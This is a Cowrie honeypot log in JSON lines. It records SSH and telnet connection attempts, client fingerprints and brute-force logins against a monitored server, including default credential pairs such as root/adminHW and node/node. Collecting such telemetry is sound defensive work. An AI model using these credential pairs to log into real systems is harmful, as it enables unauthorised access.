{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T04:45:46.731864Z","src_ip":"212.227.235.229","session":"ad01b7eecee8"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:45:47.546853Z","src_ip":"212.227.235.229","session":"ad01b7eecee8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:45:47.764671Z","src_ip":"212.227.235.229","session":"ad01b7eecee8"}
{"eventid":"cowrie.session.closed","duration":12.772660732269287,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:45:48.734393Z","src_ip":"212.227.125.160","session":"4394f2de9cfb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55367,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2941050c7ba","protocol":"telnet","message":"New connection: 212.227.125.160:55367 (1.2.3.4:23) [session: a2941050c7ba]","sensor":"my-vps","timestamp":"2025-08-28T04:45:48.948933Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:45:59.372677Z","src_ip":"212.227.125.160","session":"41a5b7569dad"}
{"eventid":"cowrie.session.closed","duration":12.76534652709961,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:46:01.714213Z","src_ip":"212.227.125.160","session":"a2941050c7ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55705,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a94c10ada11","protocol":"telnet","message":"New connection: 212.227.125.160:55705 (1.2.3.4:23) [session: 6a94c10ada11]","sensor":"my-vps","timestamp":"2025-08-28T04:46:01.952566Z"}
{"eventid":"cowrie.session.closed","duration":12.761847257614136,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:46:14.714338Z","src_ip":"212.227.125.160","session":"6a94c10ada11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56008,"dst_ip":"1.2.3.4","dst_port":23,"session":"b9b8ca67dbd2","protocol":"telnet","message":"New connection: 212.227.125.160:56008 (1.2.3.4:23) [session: b9b8ca67dbd2]","sensor":"my-vps","timestamp":"2025-08-28T04:46:14.924354Z"}
{"eventid":"cowrie.session.closed","duration":30.789367198944092,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:46:15.378183Z","src_ip":"212.227.235.229","session":"d3f6fd7c2878"}
{"eventid":"cowrie.session.closed","duration":12.76770567893982,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:46:27.691990Z","src_ip":"212.227.125.160","session":"b9b8ca67dbd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56306,"dst_ip":"1.2.3.4","dst_port":23,"session":"0ca31921e5f4","protocol":"telnet","message":"New connection: 212.227.125.160:56306 (1.2.3.4:23) [session: 0ca31921e5f4]","sensor":"my-vps","timestamp":"2025-08-28T04:46:27.876672Z"}
{"eventid":"cowrie.session.closed","duration":12.848135948181152,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:46:40.724741Z","src_ip":"212.227.125.160","session":"0ca31921e5f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56627,"dst_ip":"1.2.3.4","dst_port":23,"session":"a58cdfdb30a1","protocol":"telnet","message":"New connection: 212.227.125.160:56627 (1.2.3.4:23) [session: a58cdfdb30a1]","sensor":"my-vps","timestamp":"2025-08-28T04:46:40.935638Z"}
{"eventid":"cowrie.session.closed","duration":12.790137529373169,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:46:53.725702Z","src_ip":"212.227.125.160","session":"a58cdfdb30a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56927,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b92a9248eea","protocol":"telnet","message":"New connection: 212.227.125.160:56927 (1.2.3.4:23) [session: 2b92a9248eea]","sensor":"my-vps","timestamp":"2025-08-28T04:46:53.889767Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57930,"dst_ip":"1.2.3.4","dst_port":23,"session":"0871ef06d54e","protocol":"telnet","message":"New connection: 212.227.125.160:57930 (1.2.3.4:23) [session: 0871ef06d54e]","sensor":"my-vps","timestamp":"2025-08-28T04:47:01.627318Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:47:01.712417Z","src_ip":"212.227.125.160","session":"0871ef06d54e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:47:01.789277Z","src_ip":"212.227.125.160","session":"0871ef06d54e"}
{"eventid":"cowrie.session.closed","duration":12.801253318786621,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:47:06.690920Z","src_ip":"212.227.125.160","session":"2b92a9248eea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57251,"dst_ip":"1.2.3.4","dst_port":23,"session":"490762bb0c4b","protocol":"telnet","message":"New connection: 212.227.125.160:57251 (1.2.3.4:23) [session: 490762bb0c4b]","sensor":"my-vps","timestamp":"2025-08-28T04:47:06.897755Z"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":55424,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ba8c254db99","protocol":"ssh","message":"New connection: 139.19.117.131:55424 (1.2.3.4:22) [session: 6ba8c254db99]","sensor":"my-vps","timestamp":"2025-08-28T04:47:16.004246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:47:16.004922Z","src_ip":"139.19.117.131","session":"6ba8c254db99"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T04:47:16.021593Z","src_ip":"139.19.117.131","session":"6ba8c254db99"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","sensor":"my-vps","timestamp":"2025-08-28T04:47:16.056159Z","src_ip":"139.19.117.131","session":"6ba8c254db99"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T04:47:16.056777Z","src_ip":"139.19.117.131","session":"6ba8c254db99"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","sensor":"my-vps","timestamp":"2025-08-28T04:47:16.074080Z","src_ip":"139.19.117.131","session":"6ba8c254db99"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T04:47:16.075607Z","src_ip":"139.19.117.131","session":"6ba8c254db99"}
{"eventid":"cowrie.session.closed","duration":12.81342363357544,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:47:19.711110Z","src_ip":"212.227.125.160","session":"490762bb0c4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57564,"dst_ip":"1.2.3.4","dst_port":23,"session":"1644ad3b93d9","protocol":"telnet","message":"New connection: 212.227.125.160:57564 (1.2.3.4:23) [session: 1644ad3b93d9]","sensor":"my-vps","timestamp":"2025-08-28T04:47:19.933928Z"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:47:26.004624Z","src_ip":"139.19.117.131","session":"6ba8c254db99"}
{"eventid":"cowrie.session.closed","duration":12.770341873168945,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:47:32.704194Z","src_ip":"212.227.125.160","session":"1644ad3b93d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57880,"dst_ip":"1.2.3.4","dst_port":23,"session":"a617a4466784","protocol":"telnet","message":"New connection: 212.227.125.160:57880 (1.2.3.4:23) [session: a617a4466784]","sensor":"my-vps","timestamp":"2025-08-28T04:47:32.957269Z"}
{"eventid":"cowrie.session.closed","duration":12.752597093582153,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:47:45.709769Z","src_ip":"212.227.125.160","session":"a617a4466784"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58191,"dst_ip":"1.2.3.4","dst_port":23,"session":"586be4dd2dab","protocol":"telnet","message":"New connection: 212.227.125.160:58191 (1.2.3.4:23) [session: 586be4dd2dab]","sensor":"my-vps","timestamp":"2025-08-28T04:47:45.906295Z"}
{"eventid":"cowrie.session.closed","duration":12.792250633239746,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:47:58.698447Z","src_ip":"212.227.125.160","session":"586be4dd2dab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58495,"dst_ip":"1.2.3.4","dst_port":23,"session":"c34a1028cf74","protocol":"telnet","message":"New connection: 212.227.125.160:58495 (1.2.3.4:23) [session: c34a1028cf74]","sensor":"my-vps","timestamp":"2025-08-28T04:47:58.896109Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54987,"dst_ip":"1.2.3.4","dst_port":22,"session":"74ead2131f95","protocol":"ssh","message":"New connection: 212.227.235.229:54987 (1.2.3.4:22) [session: 74ead2131f95]","sensor":"my-vps","timestamp":"2025-08-28T04:48:00.862137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:48:00.862974Z","src_ip":"212.227.235.229","session":"74ead2131f95"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:48:00.988416Z","src_ip":"212.227.235.229","session":"74ead2131f95"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T04:48:01.573462Z","src_ip":"212.227.235.229","session":"74ead2131f95"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:48:02.700647Z","src_ip":"212.227.235.229","session":"74ead2131f95"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":56904,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb14a837c138","protocol":"ssh","message":"New connection: 77.83.240.46:56904 (1.2.3.4:22) [session: eb14a837c138]","sensor":"my-vps","timestamp":"2025-08-28T04:48:05.934633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:48:05.935355Z","src_ip":"77.83.240.46","session":"eb14a837c138"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T04:48:05.949074Z","src_ip":"77.83.240.46","session":"eb14a837c138"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"123","message":"login attempt [loginuser/123] failed","sensor":"my-vps","timestamp":"2025-08-28T04:48:06.010807Z","src_ip":"77.83.240.46","session":"eb14a837c138"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:48:07.026384Z","src_ip":"77.83.240.46","session":"eb14a837c138"}
{"eventid":"cowrie.session.closed","duration":12.81636095046997,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:48:11.712384Z","src_ip":"212.227.125.160","session":"c34a1028cf74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58806,"dst_ip":"1.2.3.4","dst_port":23,"session":"1667c3984281","protocol":"telnet","message":"New connection: 212.227.125.160:58806 (1.2.3.4:23) [session: 1667c3984281]","sensor":"my-vps","timestamp":"2025-08-28T04:48:11.898877Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62950,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff1c06a1316","protocol":"ssh","message":"New connection: 217.72.205.35:62950 (1.2.3.4:22) [session: 2ff1c06a1316]","sensor":"my-vps","timestamp":"2025-08-28T04:48:19.425770Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:48:19.427111Z","src_ip":"217.72.205.35","session":"2ff1c06a1316"}
{"eventid":"cowrie.session.closed","duration":12.840688228607178,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:48:24.739484Z","src_ip":"212.227.125.160","session":"1667c3984281"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59115,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fb3d289d7a5","protocol":"telnet","message":"New connection: 212.227.125.160:59115 (1.2.3.4:23) [session: 9fb3d289d7a5]","sensor":"my-vps","timestamp":"2025-08-28T04:48:24.973435Z"}
{"eventid":"cowrie.session.connect","src_ip":"195.178.110.224","src_port":58574,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e01992b15d3","protocol":"ssh","message":"New connection: 195.178.110.224:58574 (1.2.3.4:22) [session: 0e01992b15d3]","sensor":"my-vps","timestamp":"2025-08-28T04:48:35.692101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:48:35.694245Z","src_ip":"195.178.110.224","session":"0e01992b15d3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T04:48:35.713645Z","src_ip":"195.178.110.224","session":"0e01992b15d3"}
{"eventid":"cowrie.login.failed","username":"node","password":"node","message":"login attempt [node/node] failed","sensor":"my-vps","timestamp":"2025-08-28T04:48:35.773756Z","src_ip":"195.178.110.224","session":"0e01992b15d3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:48:36.795809Z","src_ip":"195.178.110.224","session":"0e01992b15d3"}
{"eventid":"cowrie.session.closed","duration":12.718503952026367,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:48:37.691876Z","src_ip":"212.227.125.160","session":"9fb3d289d7a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59459,"dst_ip":"1.2.3.4","dst_port":23,"session":"9e6513eef7c4","protocol":"telnet","message":"New connection: 212.227.125.160:59459 (1.2.3.4:23) [session: 9e6513eef7c4]","sensor":"my-vps","timestamp":"2025-08-28T04:48:37.883002Z"}
{"eventid":"cowrie.session.closed","duration":12.826871156692505,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:48:50.709789Z","src_ip":"212.227.125.160","session":"9e6513eef7c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59776,"dst_ip":"1.2.3.4","dst_port":23,"session":"14a87997a36e","protocol":"telnet","message":"New connection: 212.227.125.160:59776 (1.2.3.4:23) [session: 14a87997a36e]","sensor":"my-vps","timestamp":"2025-08-28T04:48:50.922744Z"}
{"eventid":"cowrie.session.closed","duration":12.782272815704346,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:49:03.704901Z","src_ip":"212.227.125.160","session":"14a87997a36e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60134,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c8439c0ac67","protocol":"telnet","message":"New connection: 212.227.125.160:60134 (1.2.3.4:23) [session: 9c8439c0ac67]","sensor":"my-vps","timestamp":"2025-08-28T04:49:03.935441Z"}
{"eventid":"cowrie.session.closed","duration":12.747113704681396,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:49:16.682482Z","src_ip":"212.227.125.160","session":"9c8439c0ac67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60506,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f19587dbb23","protocol":"telnet","message":"New connection: 212.227.125.160:60506 (1.2.3.4:23) [session: 4f19587dbb23]","sensor":"my-vps","timestamp":"2025-08-28T04:49:16.949627Z"}
